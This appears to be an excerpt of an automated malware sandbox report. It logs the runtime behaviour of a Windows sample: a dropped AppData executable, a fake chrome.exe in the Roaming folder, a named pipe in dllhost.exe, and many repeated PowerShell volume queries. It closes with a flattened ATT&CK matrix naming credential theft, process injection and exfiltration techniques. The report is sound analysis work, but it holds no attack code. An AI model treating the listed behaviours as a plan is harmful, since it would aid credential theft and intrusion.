Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,
Source: C:\Users\user\AppData\Roaming\34432.exeQueries volume information: C:\Users\user\AppData\Roaming\34432.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\34432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000C920 cpuid
Source: C:\Users\user\AppData\Roaming\34432.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400029E8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 111
Windows Management Instrumentation
11
Scheduled Task/Job
1
Access Token Manipulation
1
Disable or Modify Tools
1
Credential API Hooking
1
System Time Discovery
Remote Services | 11
Archive Collected Data
Exfiltration Over Other Network Medium | 1
Ingress Tool Transfer
Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1
System Shutdown/Reboot
Default Accounts | 11
Native API
Boot or Logon Initialization Scripts | 512
Process Injection
21
Deobfuscate/Decode Files or Information
LSASS Memory | 2
File and Directory Discovery
Remote Desktop Protocol | 1
Credential API Hooking
Exfiltration Over Bluetooth | 1
Encrypted Channel
Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 21
Command and Scripting Interpreter
Logon Script (Windows) | 11
Scheduled Task/Job
2
Obfuscated Files or Information
Security Account Manager | 26
